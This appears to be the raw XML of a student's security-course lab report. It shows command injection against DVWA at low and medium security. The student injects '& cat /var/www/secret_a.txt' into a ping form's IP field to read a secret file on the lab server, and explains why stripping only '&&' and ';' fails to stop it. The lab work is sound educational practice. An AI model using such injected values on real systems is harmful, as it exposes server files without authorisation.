          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149F73D7" wp14:editId="7C9B9053">
            <wp:extent cx="5943600" cy="2252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52345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC3B37" w14:textId="7C3B21DE" w:rsidR="0091112D" w:rsidRDefault="0091112D" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038F2E99" w14:textId="6A839547" w:rsidR="0091112D" w:rsidRDefault="0091112D" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5502A90C" w14:textId="49567FFF" w:rsidR="0091112D" w:rsidRDefault="0091112D" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here is a screenshot of </w:t>
      </w:r>
      <w:r w:rsidR="00D56429">
        <w:t xml:space="preserve">a request to GET </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00D56429" w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D56429">
        <w:t xml:space="preserve"> that I intercepted in Burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719881FA" w14:textId="71E57997" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D56429">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9641F8" wp14:editId="1AC313E3">
            <wp:extent cx="5943600" cy="17710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71015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F7734" w14:textId="2BEA7732" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB8630" w14:textId="06A7D743" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9DF08" w14:textId="17671609" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worth any marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C50C51" w14:textId="6A767057" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540C7A4A" w14:textId="77777777" w:rsidR="00CA35B5" w:rsidRDefault="00CA35B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0AF8B" w14:textId="52885AB4" w:rsidR="00D56429" w:rsidRDefault="00D56429" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325A9D5" w14:textId="4FB572C0" w:rsidR="00035293" w:rsidRDefault="00F262E2" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 2 </w:t>
      </w:r>
      <w:r w:rsidR="00035293">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999671B" w14:textId="4A9D6CC5" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>On the low security setting, the code is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06A268" w14:textId="6E3C5421" w:rsidR="00750880" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00750880">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7466D5" wp14:editId="5B99C222">
            <wp:extent cx="4686954" cy="338184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6954" cy="3381847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F580F9B" w14:textId="300454F2" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313BA474" w14:textId="5FF907E3" w:rsidR="00035293" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Using the page inspection tools, I saw that the text field has the following HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB07C55" w14:textId="7E0E5919" w:rsidR="00750880" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00750880">
        <w:t>&lt;input type="text" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00750880">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00750880">
        <w:t>" size="30"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D1C75" w14:textId="236A62AB" w:rsidR="00750880" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>This means line 5 of the PHP code retrieves the text in the text field, since the input text field has its “name” attribute set to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E8991E" w14:textId="77777777" w:rsidR="00750880" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4357F158" w14:textId="09FBF6CB" w:rsidR="00750880" w:rsidRDefault="00750880" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then the PHP has an if-else to determine whether the browser is running on Windows NT or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>not, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executes the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command with the appropriate command line arguments based on whether the OS is Windows NT or not. Then on lines 11 and 16 respectively, the result of the call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is displayed on the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22377163" w14:textId="440599D0" w:rsidR="00DD1660" w:rsidRDefault="00DD1660" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E01D7B" w14:textId="77777777" w:rsidR="007479A9" w:rsidRDefault="00DD1660" w:rsidP="007479A9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I know the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007479A9" w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007479A9" w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007479A9" w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007479A9" w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007479A9">
        <w:t xml:space="preserve"> will execute the shell command on my Linux OpenStack instance, since that is where the server is running. For this question, I am asked to read the contents of /var/www/secret_a.txt, which I can just use cat for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811E1E4" w14:textId="77777777" w:rsidR="007479A9" w:rsidRDefault="007479A9" w:rsidP="007479A9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A9A70E" w14:textId="77777777" w:rsidR="00A10409" w:rsidRDefault="007479A9" w:rsidP="007479A9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since the shell command is created by simply concatenating the unfiltered user input, I can generate any command I want to. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>I’m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not interested at all in the result of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I can both silence </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by running the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> process in the background, and I can also run my </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command right away if </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is run in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3BBE2" w14:textId="77777777" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="007479A9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0459A029" w14:textId="0C9D03D0" w:rsidR="007479A9" w:rsidRDefault="00A10409" w:rsidP="007479A9">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So my goal is to cause the following argument to be passed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: “ping -c 3 &amp; cat /var/www/secret_a.txt”. If I succeed, this will run </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the background (because of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and then run </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the foreground. To do this all, I need to enter in the webpage’s text field is the string “&amp; cat /var/www/secret_a.txt”.</w:t>
      </w:r>
      <w:r w:rsidR="007479A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481010A1" w14:textId="77777777" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B563AA6" w14:textId="1961FDBA" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00D56429">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In entered “</w:t>
      </w:r>
      <w:r w:rsidR="00A10409">
        <w:t>&amp; cat /var/www/secret_a.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” into the text field on </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/exec/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and pressed “submit”, and I got this back (note that clicking the “submit” button clears the text field):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219374AD" w14:textId="10AEE0DE" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00035293">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D97B48" wp14:editId="0DDBE728">
            <wp:extent cx="5943600" cy="72351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235190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF56F94" w14:textId="25C64CD2" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437DD5C7" w14:textId="315226BE" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I then confirmed the output was correct by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file directly on my OpenStack VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDB8CB" w14:textId="14CC254F" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00A10409">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2742"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A10409">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C01360" wp14:editId="50759F83">
            <wp:extent cx="5943600" cy="5772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772150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45F294" w14:textId="3939DBCB" w:rsidR="00035293" w:rsidRDefault="00035293" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FA2ABF" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1D64E" w14:textId="7AB251AA" w:rsidR="00035293" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Question 2 </w:t>
      </w:r>
      <w:r w:rsidR="00035293">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52750C47" w14:textId="51D4C713" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Here is the medium code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE604C8" w14:textId="2EB16226" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A10409">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64814636" wp14:editId="0DF297AC">
            <wp:extent cx="5943600" cy="41090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109085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F1C47" w14:textId="4D6E4448" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3E4F75" w14:textId="4458BC6B" w:rsidR="00A10409" w:rsidRDefault="00A10409" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As we can see, all that has changed is that lines 7-13 were added. These simply replace all instances of “&amp;&amp;” and “;” in the input string with empty strings. So for example, the input string “google.com &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” would be edited to just “ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”, and then the final </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() argument would be “ping -c 3 google.com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”. This prevents a malicious user from running their payload command by using either </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run the second command </w:t>
      </w:r>
      <w:r w:rsidR="000A6CE5">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if the first command has an exit code of 0) or with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run the second command regardless of the exit code of the first)</w:t>
      </w:r>
      <w:r w:rsidR="000A6CE5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597D6DC" w14:textId="1D1A83ED" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D43D1F3" w14:textId="1611875A" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of course, a second command can still be run using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run the second command only if the first has a non-zero exit code), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run both the first and the second command, piping the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the first command to stdin of the second command), or </w:t>
      </w:r>
      <w:r w:rsidRPr="00F262E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run the first command in the background, and then run the (optional) second command). Therefore my initial exploit continues to work without any modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554FDC23" w14:textId="73BD1902" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F49DD91" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="387549F4" w14:textId="6D46C6EA" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Here is the screenshot on medium (again, the input field is cleared after the “submit”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627599D" w14:textId="60802A94" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000A6CE5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29CDB917" wp14:editId="6B1D5CDB">
            <wp:extent cx="5943600" cy="7324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324725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE54B2" w14:textId="7F5845D9" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4628D31B" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
